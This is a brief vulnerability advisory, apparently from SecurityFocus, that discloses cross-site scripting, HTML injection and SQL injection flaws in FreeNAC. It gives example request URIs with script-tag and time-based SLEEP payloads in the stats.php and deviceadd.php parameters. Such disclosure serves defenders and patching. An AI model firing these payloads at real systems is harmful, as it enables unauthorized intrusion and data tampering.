FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities

An attacker can exploit these issues through a browser. An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues.

The following example URIs are available.

Cross-site scripting:

http://www.example.com/stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1

HTML-injection:

http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

SQL-Injection:

http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1


 

Privacy Statement
Copyright 2010, SecurityFocus